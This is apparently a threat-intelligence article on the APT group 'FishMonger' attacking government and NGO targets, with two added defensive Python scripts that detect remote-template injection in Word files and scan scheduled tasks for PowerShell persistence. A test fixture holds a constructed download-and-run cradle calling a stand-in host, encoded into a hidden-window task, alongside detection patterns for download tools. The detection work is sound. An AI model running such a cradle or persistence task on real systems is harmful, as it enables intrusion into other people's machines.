Chinese APT Group I-SOON Strikes Government and NGO Targets

21.03.2025


Recent cybersecurity research has uncovered an advanced threat actor known as “FishMonger,” allegedly operating under the Chinese company I-SOON, which has suspected ties to state-sponsored cyber espionage. This Advanced Persistent Threat (APT) group has been targeting government institutions and NGOs across Southeast Asia and parts of Europe since at least 2021.

FishMonger employs highly sophisticated attack techniques, including tailored phishing campaigns and custom malware designed to extract sensitive diplomatic and policy-related information. The group’s operations align with Chinese strategic interests, particularly focusing on organizations involved in South China Sea territorial disputes and international human rights monitoring.

A key component of the attack chain is template injection in Microsoft Office documents: the lure document references a remote template that Office fetches and loads when the file is opened, so the malicious content lives on a server the attacker controls rather than in the document that passes through email filtering. The delivered stage installs a custom backdoor known as “SilentBreeze,” which communicates with its command-and-control servers over encrypted channels; the encryption hides the traffic from content inspection and helps the operators keep long-term access to compromised networks. FishMonger also updates its toolset frequently to stay ahead of signature-based defenses.
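Template injection leaves a concrete artifact in the document itself: a Word file is a ZIP archive, and the remote template is declared as an `attachedTemplate` relationship (normally in `word/_rels/settings.xml.rels`) whose target is a URL or UNC path rather than a local file. The scanner below is an added example, not code from the original article or from the research it summarizes; it builds two constructed fixtures in memory (a document pointing at the hypothetical `http://example.invalid/...` and the ordinary local `Normal.dotm` case) and reports only relationships that would make Office reach across the network.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# Word keeps the attachedTemplate relationship in settings.xml.rels; document.xml.rels is
# checked as well in case a tool moved it.
REL_PARTS = ("word/_rels/settings.xml.rels", "word/_rels/document.xml.rels")


def is_remote(target: str) -> bool:
    """True when a relationship target would make Word fetch the template over the network."""
    t = target.strip().lower()
    if re.match(r"^(?:https?|ftps?)://", t):
        return True
    if t.startswith("\\\\") or t.startswith("//"):        # UNC share
        return True
    if re.match(r"^file://[^/]", t):                       # file://host/share, not file:///C:/...
        return True
    return False


def find_remote_templates(docx_bytes: bytes) -> list:
    """Return every attachedTemplate relationship whose target is remote."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        for part in REL_PARTS:
            if part not in names:
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{REL_NS}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if is_remote(target):
                    findings.append({"part": part, "id": rel.get("Id"), "target": target,
                                     "target_mode": rel.get("TargetMode", "Internal")})
    return findings


def build_docx(settings_rels: str) -> bytes:
    """Build a minimal .docx around the given settings.xml.rels (constructed test fixture)."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>')
        zf.writestr("word/settings.xml",
                    f'<w:settings xmlns:w="{w_ns}" xmlns:r="{r_ns}">'
                    '<w:attachedTemplate r:id="rId1"/></w:settings>')
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')

# Constructed: the template is pulled from a web server (the injection case; hypothetical host).
INJECTED_RELS = RELS_HEAD + (
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="http://example.invalid/templates/report.dotm" TargetMode="External"/>'
    '</Relationships>')

# Constructed: the ordinary case. Normal.dotm on the local profile is also TargetMode="External",
# so TargetMode alone is not a usable signal; the scheme and host of the target are.
LOCAL_RELS = RELS_HEAD + (
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm" '
    'TargetMode="External"/></Relationships>')

if __name__ == "__main__":
    for label, rels in (("injected", INJECTED_RELS), ("local", LOCAL_RELS)):
        print(label, find_remote_templates(build_docx(rels)))
```

The same check applies to `.docm` and `.dotm` files, which share the package layout. A remote template is not proof of compromise by itself, since some organisations distribute corporate templates from an internal share, so treat a hit as a triage item and compare the host against known-good template locations.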

The group’s attacks typically begin with spear-phishing emails carrying documents tailored to the target. Once opened, these files either exploit vulnerabilities or rely on social engineering (such as persuading the user to enable active content) to launch a multi-stage infection. SilentBreeze then establishes persistence through scheduled tasks that run malicious PowerShell commands, which download further payloads and give the operators remote access.
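Scheduled-task persistence of this kind is visible on disk: every task is an XML definition under `C:\Windows\System32\Tasks`, and the action that launches PowerShell sits in its `Exec` element. The triage script below is an added example, not code from the original article or from the research behind it. It parses task XML, decodes a `-EncodedCommand` argument (base64 of UTF-16LE) so that the real command can be inspected, and flags the combination of hidden window, execution-policy bypass, no-profile and download-cradle patterns that a payload-download task usually shows. The two task definitions, the task names and the `http://example.invalid/...` URL are constructed for the example.

```python
import base64
import binascii
import os
import re
from typing import Optional
from xml.etree import ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# powershell.exe or pwsh, with or without a directory; quotes are stripped before matching
PS_BINARY = re.compile(r"(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?$", re.I)
# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|ncoded|nc|n|c)?\s+([A-Za-z0-9+/=]+)", re.I)

INDICATORS = {
    "hidden_window":   re.compile(r"-w[a-z]*\s+(?:hidden|1)\b", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecutionpolicy|p)\s+(?:bypass|unrestricted)\b", re.I),
    "no_profile":      re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
        r"Invoke-Expression|\biex\b|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I),
}


def decode_encoded_command(arguments: str) -> Optional[str]:
    """Decode PowerShell's -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_task_xml(xml) -> list:
    """Return one finding per PowerShell Exec action in a Task Scheduler XML definition.

    Pass the bytes of a file from C:\\Windows\\System32\\Tasks unchanged: the files are UTF-16
    with a BOM and the parser needs the raw bytes to honour the declared encoding.
    """
    root = ET.fromstring(xml)
    task = root.findtext(f"{TASK_NS}RegistrationInfo/{TASK_NS}URI") or "<no URI>"
    findings = []
    for exe in root.iter(f"{TASK_NS}Exec"):
        command = (exe.findtext(f"{TASK_NS}Command") or "").strip().strip('"')
        args = (exe.findtext(f"{TASK_NS}Arguments") or "").strip()
        if not PS_BINARY.search(command):
            continue
        decoded = decode_encoded_command(args)
        # indicators are matched against the visible arguments and the decoded command together
        haystack = args if decoded is None else args + "\n" + decoded
        hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
        if decoded is not None:
            hits.append("encoded_command")
        findings.append({"task": task, "command": command, "arguments": args,
                         "decoded": decoded, "indicators": hits})
    return findings


def scan_tasks_dir(root_dir: str) -> list:
    """Walk a Task Scheduler directory and return the findings that carry any indicator."""
    out = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            try:
                with open(os.path.join(dirpath, name), "rb") as fh:
                    findings = analyze_task_xml(fh.read())
            except (ET.ParseError, OSError):
                continue
            out.extend(f for f in findings if f["indicators"])
    return out


# Constructed fixture: a download cradle hidden behind -EncodedCommand (hypothetical host).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
MALICIOUS_TASK = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\UpdateCheck</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
    <Arguments>-nop -w hidden -ep bypass -enc {ENCODED}</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed fixture: an administrator's backup job, which should produce no indicators.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Nightly\\Backup</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for sample in (MALICIOUS_TASK, BENIGN_TASK):
        for finding in analyze_task_xml(sample):
            print(finding["task"], finding["indicators"], finding["decoded"])
```

Run `scan_tasks_dir(r"C:\Windows\System32\Tasks")` from an elevated prompt on a live host, or point it at a copy of the directory taken during forensic collection. The decoded command is the part worth keeping in the case file: the base64 argument alone tells a responder nothing, while the decoded text names the download location that the task contacts.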

To evade detection, FishMonger routes its command-and-control traffic through compromised third-party websites, so that a victim’s outbound connections go to legitimate-looking domains while the real C2 servers stay hidden behind them; this complicates both attribution and blocking. The group’s evolving techniques highlight the persistent cyber threats faced by government institutions and NGOs operating in politically sensitive regions.
